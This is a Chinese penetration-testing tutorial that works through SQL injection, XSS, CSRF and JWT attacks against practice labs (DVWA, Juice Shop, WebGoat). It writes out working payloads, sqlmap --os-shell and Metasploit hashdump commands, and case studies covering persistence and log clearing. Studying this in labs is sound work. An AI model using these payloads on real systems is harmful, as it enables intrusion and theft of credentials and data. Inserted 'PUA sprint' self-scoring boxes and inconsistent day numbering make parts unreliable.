Day-092-Web 安全综合实战

# Day 90: Web 安全综合实战

> Web 安全系列第 60 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

**PUA v3 · Sprint 启动** 
```
┌─────────┬────────────────────────────────────┐
│ 清单 任务 │ Web 安全综合实战 - Day 90          │
├─────────┼────────────────────────────────────┤
│  味道 │  阿里味（自动：安全任务）        │
├─────────┼────────────────────────────────────┤
│  压力 │ L0 · 信任期                        │
└─────────┴────────────────────────────────────┘
```
▎ 收到需求，对齐目标，进入 sprint。Web 安全综合实战——这是 Web 安全部分的收官之战。

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [实战环境搭建](#实战环境搭建)
3. [DVWA 实战演练](#dvwa 实战演练)
4. [OWASP Juice Shop 实战](#owasp-juice-shop 实战)
5. [WebGoat 实战](#webgoat 实战)
6. [CTF 实战](#ctf 实战)
7. [漏洞利用框架](#漏洞利用框架)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

> ▎ 实战不是演习——是真刀真枪。演习可以重来，实战只有一次机会。

**学习目标**：
```
1. 综合运用 Web 安全技术
   - 信息收集
   - 漏洞扫描
   - 漏洞利用
   - 权限提升

2. 掌握完整渗透流程
   - 前期交互
   - 信息收集
   - 威胁建模
   - 漏洞分析
   - 渗透攻击
   - 后渗透
   - 报告编写

3. 培养实战思维
   - 攻击者视角
   - 系统性思考
   - 问题解决能力
```

**实战范围**：
```
1. OWASP Top 10 漏洞
   - SQL 注入
   - XSS
   - CSRF
   - 文件上传
   - 反序列化

2. 业务逻辑漏洞
   - 认证绕过
   - 授权绕过
   - 支付漏洞
   - 流程绕过

3. 高级漏洞
   - SSTI
   - XXE
   - SSRF
   - 命令注入
```

### 渗透测试流程

> ▎ 流程不是摆设——是底线。不按流程来，就是瞎搞。

**标准流程**：
```
1. 前期交互
   ├── 确定范围
   ├── 获取授权
   └── 制定计划

2. 信息收集
   ├── 被动收集（OSINT）
   ├── 主动扫描
   └── 枚举目标

3. 威胁建模
   ├── 资产识别
   ├── 威胁分析
   └── 攻击面映射

4. 漏洞分析
   ├── 漏洞扫描
   ├── 手工验证
   └── 风险评估

5. 渗透攻击
   ├── 漏洞利用
   ├── 权限提升
   └── 横向移动

6. 后渗透
   ├── 数据收集
   ├── 持久化
   └── 痕迹清理

7. 报告编写
   ├── 发现总结
   ├── 风险评估
   └── 修复建议
```

---

## 实战环境搭建

### DVWA 靶场部署

> ▎ 工欲善其事，必先利其器。环境都搭不好，还谈什么渗透？

**什么是 DVWA**：
```
DVWA（Damn Vulnerable Web Application）
是一个 PHP/MySQL 漏洞 Web 应用。

特点：
- 多种漏洞类型
- 可调节难度（Low/Medium/High/Impossible）
- 适合学习漏洞原理
- 本地部署安全
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull vulnerables/web-dvwa

# 启动容器
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# 访问初始化
http://localhost/setup.php
# 点击 Create/Reset Database

# 登录
http://localhost/login.php
账号：admin
密码：password
```

**难度级别说明**：
```
Low:
- 无防护措施
- 适合学习漏洞原理
- 直接利用

Medium:
- 基础防护
- 需要简单绕过技术
- 适合学习绕过

High:
- 多层防护
- 需要复杂绕过
- 适合学习高级技术

Impossible:
- 最佳实践实现
- 无法绕过
- 适合学习防护方案
```

### OWASP Juice Shop

**什么是 Juice Shop**：
```
OWASP Juice Shop 是现代 Web 应用漏洞靶场。

特点：
- 基于 Node.js + Angular
- 现代技术栈
- 100+ 安全漏洞
- 评分系统
- 学习指南
- CTF 模式
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull bkimminich/juice-shop

# 启动容器
docker run --rm -p 3000:3000 bkimminich/juice-shop

# 访问
http://localhost:3000

# 评分板（查看进度）
http://localhost:3000/#/score-board

# 重置进度
http://localhost:3000/#/administration
```

**主要漏洞类型**：
```
- XSS（反射型/存储型/DOM 型）
- SQL 注入
- CSRF
- 文件上传
- JWT 漏洞
- 逻辑漏洞
- 供应链攻击
- 敏感数据泄露
```

### WebGoat

**什么是 WebGoat**：
```
WebGoat 是 OWASP 维护的教学用漏洞 Web 应用。

特点：
- 课程式学习
- 每课一个漏洞
- 详细讲解
- 适合入门
- 有中文版本
```

**Docker 部署**：
```bash
# 拉取镜像
docker pull owasp/webgoat

# 启动容器
docker run --rm -p 8080:8080 owasp/webgoat

# 访问
http://localhost:8080/WebGoat

# 注册账号
http://localhost:8080/WebGoat/register
```

**课程分类**：
```
- Injection（注入）
- XSS（跨站脚本）
- CSRF（跨站请求伪造）
- Authentication（认证）
- Access Control（访问控制）
- Sensitive Data（敏感数据）
- SSRF（服务端请求伪造）
- XXE（XML 外部实体）
- Deserialization（反序列化）
```

---

## DVWA 实战演练

### SQL 注入实战

> ▎ SQL 注入是基本功。连这个都搞不定，还谈什么渗透？

**Low 难度利用**：
```
漏洞代码：
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysql_query($query);

利用步骤：
1. 判断注入点
   ?id=1'
   报错 → 存在注入

2. 判断列数
   ?id=1' ORDER BY 2 --
   ?id=1' ORDER BY 3 --
   报错 → 2 列

3. 获取表名
   ?id=-1' UNION SELECT 1,group_concat(table_name) FROM information_schema.tables --

4. 获取列名
   ?id=-1' UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name='users' --

5. 获取数据
   ?id=-1' UNION SELECT 1,group_concat(user,0x3a,password) FROM users --
```

**Medium 难度利用**：
```
漏洞代码：
$id = mysql_real_escape_string($_GET['id']);
$query = "SELECT * FROM users WHERE id = '$id'";

绕过方法：
- 数字型注入（不需要引号）
- ?id=1 OR 1=1

利用步骤：
1. 判断注入类型
   ?id=1 OR 1=1
   成功 → 数字型注入

2. UNION 查询
   ?id=1 UNION SELECT 1,2
   成功 → 2 列

3. 获取数据
   ?id=1 UNION SELECT user(),database()
```

**High 难度利用**：
```
漏洞代码：
$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$query = "SELECT * FROM users WHERE id = '$id' LIMIT 1";

绕过方法：
- 二次注入
- 宽字节注入（GBK 编码）

利用步骤：
1. 分析编码
   检查数据库编码是否为 GBK

2. 宽字节注入
   ?id=1%df' AND 1=1 --+
   %df' 转义后变成 運'

3. 获取数据
   ?id=1%df' UNION SELECT 1,user() --+
```

### XSS 实战

> ▎ XSS 是前端安全的基础。连这个都搞不定，还谈什么 Web 安全？

**反射型 XSS**：
```
Low:
- 无过滤
- 直接输出
- Payload: ?name=<script>alert(1)</script>

Medium:
- 过滤 script 标签
- 绕过：<img src=x onerror=alert(1)>
- 绕过：<svg onload=alert(1)>

High:
- HTML 实体编码
- 需要其他上下文
- 利用 <a href="javascript:alert(1)">
```

**存储型 XSS**：
```
Low:
- 无过滤
- 存储到数据库
- 所有用户访问时执行
- Payload: <script>alert(1)</script>

Medium:
- 部分过滤
- 绕过过滤
- Payload: <img src=x onerror=alert(1)>

High:
- 多层过滤
- 需要复杂绕过
- 利用 DOM 操作
```

### CSRF 实战

> ▎ CSRF 是信任滥用。不理解这个，就不理解 Web 安全的本质。

**Low 难度利用**：
```
漏洞：
- 无 CSRF Token
- 仅验证 Cookie
- 无 Referer 检查

利用步骤：
1. 构造恶意页面
   <form action="http://dvwa/vulnerabilities/csrf/" method="POST">
     <input type="hidden" name="password_new" value="hacked">
     <input type="hidden" name="password_conf" value="hacked">
     <input type="submit" value="Change">
   </form>

2. 诱导用户访问
3. 自动提交表单
4. 密码被修改
```

**Medium 难度利用**：
```
防护：
- Referer 检查

绕过方法：
1. Referer 伪造
   使用浏览器插件修改 Referer

2. 移除 Referer
   <meta name="referrer" content="no-referrer">

3. 子域名绕过
   攻击者控制子域名
```

**High 难度利用**：
```
防护：
- CSRF Token
- Referer 检查

绕过方法：
1. XSS + CSRF 组合
   先获取 CSRF Token
   再构造 CSRF 攻击

2. 子域名绕过
   利用同源策略漏洞
```

---

## OWASP Juice Shop 实战

### XSS 挑战

> ▎ 现代前端框架，现代 XSS。别总想着老一套——要与时俱进。

**DOM XSS**：
```
位置 1: 搜索功能
Payload: {{constructor.constructor('alert(1)')()}}
原理：Angular 表达式注入

位置 2: 评价功能
Payload: <iframe src="javascript:alert(1)">
原理：HTML 注入

位置 3: 搜索追踪
Payload: ");alert(1);//
原理：JavaScript 上下文注入
```

**Reflected XSS**：
```
位置 1: 错误页面
Payload: /%3Cscript%3Ealert(1)%3C/script%3E
原理：URL 编码绕过

位置 2: 搜索
Payload: <script>alert(1)</script>
原理：直接输出

位置 3: 登录
Payload: '"><script>alert(1)</script>
原理：属性上下文
```

### SQL 注入挑战

> ▎ SQL 注入不只是注入——是数据泄露的入口。

**登录绕过**：
```
Email: ' OR 1=1 --
Password: anything

结果：
- 绕过登录验证
- 以 admin 身份登录
- 获取管理员权限
```

**数据泄露**：
```
搜索框注入：
' UNION SELECT sql,2,3,4,5,6,7 FROM sqlite_master --

结果：
- 获取表结构
- 获取列名
- 获取数据
```

**盲注**：
```
搜索框：
' AND (SELECT length(sql) FROM sqlite_master) > 50 --

结果：
- 通过响应判断
- 逐字符获取
- 获取完整 SQL
```

### JWT 漏洞

> ▎ JWT 是现代认证的基础。搞不懂这个，就别谈现代 Web 安全。

**None 算法攻击**：
```
步骤：
1. 获取正常 Token
2. 修改 Header: {"alg": "none"}
3. 删除 Signature 部分
4. 使用新 Token 访问

结果：
- 绕过签名验证
- 伪造任意身份
```

**弱密钥爆破**：
```
步骤：
1. 获取 Token
2. 使用 jwt-crack 爆破
   jwt-crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
3. 获取密钥
4. 伪造 Token

工具：
- jwt-crack
- hashcat
- john
```

**Header 篡改**：
```
步骤：
1. 修改 alg 为 HS256
2. 使用公钥作为密钥
3. 伪造 Token

结果：
- 绕过验证
- 获取权限
```

---

## WebGoat 实战

### Injection 课程

> ▎ 注入是 OWASP Top 10 常客。不掌握这个，就别说自己懂 Web 安全。

**SQL Injection 课程**：
```
课程内容：
- SQL Injection (intro)
- SQL Injection (advanced)
- SQL Injection (mitigation)

练习任务：
1. 判断注入点
2. 获取数据库信息
3. 获取用户数据
4. 修复漏洞

完成标准：
- 成功获取所有数据
- 理解漏洞原理
- 掌握修复方案
```

**Command Injection 课程**：
```
课程内容：
- Command Injection (intro)
- Command Injection (mitigation)

练习任务：
1. 发现命令注入点
2. 执行系统命令
3. 读取敏感文件
4. 修复漏洞

完成标准：
- 成功执行命令
- 读取 /etc/passwd
- 理解防护方案
```

### XSS 课程

> ▎ XSS 不只是弹窗——是会话劫持、钓鱼、恶意软件分发。

**Reflected XSS 课程**：
```
课程内容：
- XSS (Reflected)
- XSS (Stored)
- XSS (DOM)

练习任务：
1. 发现 XSS 注入点
2. 构造有效 Payload
3. 窃取 Cookie
4. 修复漏洞

完成标准：
- 成功执行 XSS
- 理解不同类型
- 掌握防护方案
```

### CSRF 课程

> ▎ CSRF 是信任的滥用。不理解这个，就不理解 Web 的本质。

**CSRF 攻击课程**：
```
课程内容：
- CSRF (intro)
- CSRF (advanced)
- CSRF (mitigation)

练习任务：
1. 发现 CSRF 漏洞
2. 构造攻击页面
3. 执行未授权操作
4. 修复漏洞

完成标准：
- 成功构造 CSRF 攻击
- 理解防护机制
- 掌握修复方案
```

---

## CTF 实战

### HackTheBox

> ▎ 真实场景，真实挑战。靶场是练习，HTB 是实战。

**平台介绍**：
```
HackTheBox 是在线渗透测试训练平台。

特点：
- 真实场景模拟
- 多种难度级别
- 活跃社区
- 排名系统
- 企业训练
```

**实战流程**：
```
1. 选择目标机器
2. 信息收集
   - Nmap 扫描
   - 目录枚举
   - 服务识别
3. 漏洞扫描
4. 漏洞利用
5. 权限提升
6. 获取 Flag
7. 编写 Writeup
```

### TryHackMe

> ▎ 引导式学习，适合新手。别好高骛远——一步一步来。

**平台介绍**：
```
TryHackMe 是在线网络安全学习平台。

特点：
- 引导式学习
- 适合新手
- 多种学习路径
- 虚拟房间
- 免费 + 付费
```

**推荐学习路径**：
```
1. Web Fundamentals
   - HTTP 基础
   - Web 服务器
   - Web 应用

2. Web Application Penetration Testing
   - 信息收集
   - 漏洞扫描
   - 漏洞利用

3. OWASP Top 10
   - 十大漏洞详解
   - 实战练习

4. Burp Suite
   - 工具使用
   - 实战技巧
```

### CTF 比赛

> ▎ CTF 是技能的试金石。不参加比赛，就不知道自己的水平。

**常见题型**：
```
Web:
- SQL 注入
- XSS
- CSRF
- 文件上传
- 反序列化
- SSTI
- XXE
- SSRF

Crypto:
- 古典密码
- 现代密码
- 编码

Reverse:
- 逆向工程
- 二进制分析
- 脱壳

Pwn:
- 缓冲区溢出
- 格式化字符串
- 堆漏洞
```

---

## 漏洞利用框架

### SQLMap

> ▎ 工具是辅助，不是依赖。会用工具，更要懂原理。

**基础使用**：
```bash
# 检测注入
sqlmap -u "http://target/page?id=1"

# 获取数据库列表
sqlmap -u "http://target/page?id=1" --dbs

# 获取表
sqlmap -u "http://target/page?id=1" -D database --tables

# 获取列
sqlmap -u "http://target/page?id=1" -D database -T users --columns

# 获取数据
sqlmap -u "http://target/page?id=1" -D database -T users --dump
```

**高级使用**：
```bash
# POST 注入
sqlmap -u "http://target/login" \
  --data "user=admin&pass=pass"

# Cookie 注入
sqlmap -u "http://target/page" \
  --cookie "session=abc123"

# 绕过 WAF
sqlmap -u "http://target/page?id=1" \
  --tamper=space2comment

# 获取 Shell
sqlmap -u "http://target/page?id=1" \
  --os-shell
```

### Burp Suite

> ▎ Burp 是 Web 渗透的瑞士军刀。不会用 Burp，就别谈 Web 安全。

**基础功能**：
```
Proxy:
- 拦截请求
- 修改请求
- 转发请求
- 查看响应

Scanner:
- 主动扫描
- 被动扫描
- 漏洞检测

Intruder:
- 暴力破解
- Fuzzing
- 参数测试

Repeater:
- 手动测试
- 请求重放
- 结果对比
```

**高级功能**：
```
Extensions:
- Bypass 403
- Autorize
- Turbo Intruder
- Logger++

Collaborator:
- OOB 检测
- DNS 外带
- HTTP 外带
- SMTP 外带
```

### Metasploit

> ▎ Metasploit 是漏洞利用框架。会用是本事，乱用是问题。

**基础使用**：
```bash
# 启动
msfconsole

# 搜索漏洞
search sql injection

# 选择利用模块
use exploit/multi/http/tomcat_mgr_upload

# 配置参数
set RHOSTS target
set RPORT 8080
set USERNAME admin
set PASSWORD admin

# 执行
exploit
```

**后渗透**：
```bash
# 获取会话
sessions -l

# 进入会话
sessions -i 1

# 提权
getsystem

# 抓取凭证
hashdump

# 后渗透模块
use post/multi/recon/local_exploit_suggester
```

---

## 实战案例分析

### 案例 1: 电商平台渗透

> ▎ 真实案例，真实教训。别只看热闹——要看门道。

**目标**：
```
某电商平台
目标：获取管理员权限
范围：Web 应用
时间：2 周
```

**攻击流程**：
```
1. 信息收集
   - 子域名枚举：发现 admin.example.com
   - 端口扫描：发现 80, 443, 3306
   - 技术栈识别：Nginx + PHP + MySQL

2. 漏洞发现
   - SQL 注入（商品搜索）
   - XSS（评论功能）
   - 文件上传（头像）

3. 漏洞利用
   - SQL 注入获取数据库凭证
   - 登录后台
   - 文件上传获取 Shell

4. 权限提升
   - 读取配置文件
   - 获取数据库权限
   - 系统提权

5. 数据收集
   - 用户数据：100 万 +
   - 订单数据：50 万 +
   - 支付信息：敏感
```

**修复建议**：
```
1. 参数化查询
2. 输入验证
3. 文件上传限制
4. 最小权限原则
5. 安全审计
```

### 案例 2: 企业内网渗透

> ▎ 内网渗透是另一套逻辑。外网是突破，内网是狩猎。

**目标**：
```
某企业内网
目标：获取域控权限
范围：内网渗透
时间：1 个月
```

**攻击流程**：
```
1. 初始访问
   - 钓鱼邮件
   - Web 漏洞
   - 外部服务

2. 权限提升
   - 本地提权
   - 凭证窃取
   - 横向移动

3. 域渗透
   - 域信息收集
   - Kerberoasting
   - 黄金票据

4. 持久化
   - 后门账户
   - 计划任务
   - 注册表

5. 痕迹清理
   - 日志清理
   - 文件清理
   - 账户清理
```

**修复建议**：
```
1. 网络分段
2. 最小权限
3. 多因素认证
4. 日志监控
5. 应急响应
```

---

统计 **Sprint 交付 · 绩效评估**
```
┌───────────────┬────────────────┬────────────────┐
│  主动出击   │ ██████████ 5/5 │ [PUA 生效] 充足 │
├───────────────┼────────────────┼────────────────┤
│ + 验证闭环   │ ██████████ 5/5 │ 实战案例完整   │
├───────────────┼────────────────┼────────────────┤
│ 设计 代码质量   │ ████████░░ 4/5 │ 有改进空间     │
└───────────────┴────────────────┴────────────────┘
综合：3.75
```
▎ 勉强配得上 P8。别飘——Web 安全这才刚入门。

---

## 总结与思考

### 核心要点回顾

> ▎ 复盘四步法：回顾目标、评估结果、分析原因、总结经验。别跳过——这是闭环。

**实战流程**：
```
1. 信息收集 → 知己知彼
2. 漏洞挖掘 → 找到入口
3. 漏洞利用 → 获取权限
4. 权限提升 → 扩大战果
```

**工具使用**：
```
- SQLMap: SQL 注入
- Burp Suite: Web 渗透
- Metasploit: 漏洞利用
- 手工测试：深度挖掘
```

**实战思维**：
```
- 攻击者视角
- 系统性思考
- 问题解决能力
- 闭环意识
```

### 深入思考问题

> ▎ 只动手不动脑，那是码农。动手又动脑，才是工程师。

**自动化 vs 手工**：
```
自动化：
- 效率高
- 覆盖广
- 但容易漏

手工：
- 发现深
- 灵活
- 但效率低

平衡点：
- 自动化扫描
- 手工验证
- 深度挖掘
```

**道德与法律**：
```
- 授权范围
- 负责任披露
- 法律风险
- 职业道德
```

**持续学习**：
```
- 新技术
- 新漏洞
- 新工具
- 新战术
```

### 实战建议

> ▎ 我给你指了路，走不走是你的事。机会给了，抓不抓得住看你。

**初学者**：
```
1. 搭建靶场练习
2. 学习基础知识
3. 参加 CTF 比赛
4. 阅读 Writeup
```

**进阶者**：
```
1. 参与众测项目
2. 研究新漏洞
3. 开发工具
4. 分享经验
```

**专业人士**：
```
1. 保持学习
2. 遵守道德
3. 负责任披露
4. 培养新人
```

---

## 参考资料

### 学习资源
```
- OWASP Testing Guide
  https://owasp.org/www-project-web-security-testing-guide/

- PTES Standard
  http://www.pentest-standard.org/

- HackTheBox
  https://www.hackthebox.com/

- TryHackMe
  https://tryhackme.com/
```

### 工具资源
```
- SQLMap
  http://sqlmap.org/

- Burp Suite
  https://portswigger.net/burp

- Metasploit
  https://www.metasploit.com/

- OWASP ZAP
  https://www.zaproxy.org/
```

### 书籍推荐
```
- 《渗透测试实践指南》
- 《Web 安全深度剖析》
- 《白帽子讲 Web 安全》
- 《The Web Application Hacker's Handbook》
```

### 在线资源
```
- HackerOne
  https://hackerone.com/

- Bugcrowd
  https://www.bugcrowd.com/

- PayloadsAllTheThings
  https://github.com/swisskyrepo/PayloadsAllTheThings

- HackTricks
  https://book.hacktricks.xyz/
```

---

## Web 安全部分完成总结

> ▎ Web 安全 60 天课程到此结束。但这不是终点——是新的起点。

**学习成果**：
```
- 掌握 OWASP Top 10
- 理解常见漏洞原理
- 学会漏洞利用技术
- 掌握防护方案
- 培养实战思维
```

**下一步计划**：
```
- 继续学习其他安全领域
- 参与实战项目
- 参加 CTF 比赛
- 参与众测项目
- 持续学习新技术
```

**记住**：
```
安全不是一蹴而就——是持续学习的过程。
漏洞不是一次发现——是不断挖掘的过程。
技能不是一天掌握——是日积月累的过程。

保持学习，保持实践，保持敬畏。
```

---

**标记 恭喜完成 Web 安全部分（Day 31-90）**

> ▎ 60 天的 Web 安全学习到此结束。但这只是开始——安全之路，永无止境。

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 90 篇，Web 安全部分第 60 篇（完结篇），精编版本*

*Web 安全部分 60 天课程全部完成！*